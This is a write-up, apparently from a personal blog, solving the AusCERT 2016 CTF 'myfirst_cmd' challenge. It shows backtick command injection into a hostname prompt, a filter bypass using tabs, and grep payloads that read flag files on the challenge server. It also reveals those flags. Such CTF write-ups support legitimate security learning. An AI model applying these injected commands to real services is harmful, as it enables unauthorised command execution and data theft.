The AusCERT 2016 Capture The Flag (CTF) was run from the 24th to 26th of May 2016, this is my solution to the first “Pwning” challenge myfirst_cmd which was worth 100 points.
The challenge instructions were as follows:
Solve this challenge to access the flag file. Network Connection: nc -v exploit1.ctf.shearwater.com.au 31338
There was also a download available for myfirst_cmd which was running on the remote server.
Upon connecting to the remote server this is what we got.
root@kali:~# nc -v exploit1.ctf.shearwater.com.au 31338 DNS fwd/rev mismatch: exploit1.ctf.shearwater.com.au != ec2-52-62-146-148.ap-southeast-2.compute.amazonaws.com exploit1.ctf.shearwater.com.au [52.62.146.148] 31338 (?) open Welcome to the myfirst_cmd! Please provide select one of the following commands to perform remote network administration of the server. [1] ifconfig [2] ping [3] host [4] exit
By entering a number you could run the commands listed.
I downloaded the binary and quickly ran strings over it to get a rough idea of what it contained.
It looks like ping and host differ slightly in what they accept.
ping "%s" host %s
When trying to escape the host command I found that some symbols would be removed, “/” for example did not seem to work.
Within the binary there was a section containing the following.
!\/$()&|#'",;
I believe this was a list of the symbols that were not allowed and would be stripped.
Testing some basic commands confirms that we can run things with backticks.
[1] ifconfig [2] ping [3] host [4] exit 3 Please enter the target hostname or IP address: 8.8.8.8 `pwd` host: couldn't get address for '/': not found [1] ifconfig [2] ping [3] host [4] exit 3 Please enter the target hostname or IP address: 8.8.8.8 `id` host: couldn't get address for 'uid=1003(myfirst_cmd)': not found
However if there were any spaces within the output it would cut off. I also found that we could not use spaces in our query, however tab worked for this purpose.
I figured I would try a grep on everything for “flag{” as this was the known flag string.
After performing a grep the below response was received, disclosing some potentially useful directories.
grep: CTF/myfirst_86/rop/flag: Permission denied grep: CTF/myfirst_86/flag: Permission denied grep: CTF/carmen/carmen.py: Permission denied grep: CTF/myfirst_cmd/myfirst_cmd: Permission denied
Based on this a few challenges for the CTF were hosted here, however our user did not have access to these files.
I want to take a look in CTF/myfirst_cmd, as we are working on the myfirst_cmd challenge, however I did not find any way of performing an ls or otherwise entering the directory due to the limitations in place.
After poking it for hours and reading the grep manual page a couple of times, the -o option looks like it will be the best choice, as it will print only the matched parts of matching lines which will prevent output being cut off due to spacing.
root@kali:~# nc -v exploit1.ctf.shearwater.com.au 31338
DNS fwd/rev mismatch: exploit1.ctf.shearwater.com.au != ec2-52-62-146-148.ap-southeast-2.compute.amazonaws.com
exploit1.ctf.shearwater.com.au [52.62.146.148] 31338 (?) open
Welcome to the myfirst_cmd!
Please provide select one of the following commands to perform remote network administration of the server.
[1] ifconfig
[2] ping
[3] host
[4] exit
3
Please enter the target hostname or IP address:
8.8.8.8 `grep -oR flag{.*} CTF`
grep: CTF/myfirst_86/rop/flag: Permission denied
grep: CTF/myfirst_86/flag: Permission denied
grep: CTF/carmen/carmen.py: Permission denied
grep: CTF/myfirst_cmd/myfirst_cmd: Permission denied
host: couldn't get address for 'CTF/myfirst_math/myfirst_math.py:flag{C0ngrats_0n_maTh1ng_m3}': not found
Here we get the output for a flag, however it’s an incorrect flag. I’m not sure if this was a mistake in the file permissions, but this is a flag for a different challenge that my team had already solved.
With some negative matching I ignore any flag starting with “C” and get the following result.
root@kali:~# nc -v exploit1.ctf.shearwater.com.au 31338
DNS fwd/rev mismatch: exploit1.ctf.shearwater.com.au != ec2-52-62-146-148.ap-southeast-2.compute.amazonaws.com
exploit1.ctf.shearwater.com.au [52.62.146.148] 31338 (?) open
Welcome to the myfirst_cmd!
Please provide select one of the following commands to perform remote network administration of the server.
[1] ifconfig
[2] ping
[3] host
[4] exit
3
Please enter the target hostname or IP address:
8.8.8.8 `grep -oRiP flag{[^C].*} CTF`
grep: CTF/myfirst_86/rop/flag: Permission denied
grep: CTF/myfirst_86/flag: Permission denied
grep: CTF/carmen/carmen.py: Permission denied
grep: CTF/myfirst_cmd/myfirst_cmd: Permission denied
host: couldn't get address for 'CTF/myfirst_cmd/flag:flag{W00H00_sTR1ng_SubST1tut10n_1s_GR3At!}': not found
The solution looks simple, but I can asure you I spent hours trying to bypass the filter. I was even trying to inject forward slashes into my commands by taking advantage of the fact that pwd was currently /, for instance “ls CTF`pwd`myfirst_cmd” which I was hoping would give me the correct path of CTF/myfirst_cmd however this didn’t quite go as planned.
It was a fun challenge and if anything I learned quite a lot about grep and basic regex, an area I definitely need to improve on.
0 Comments.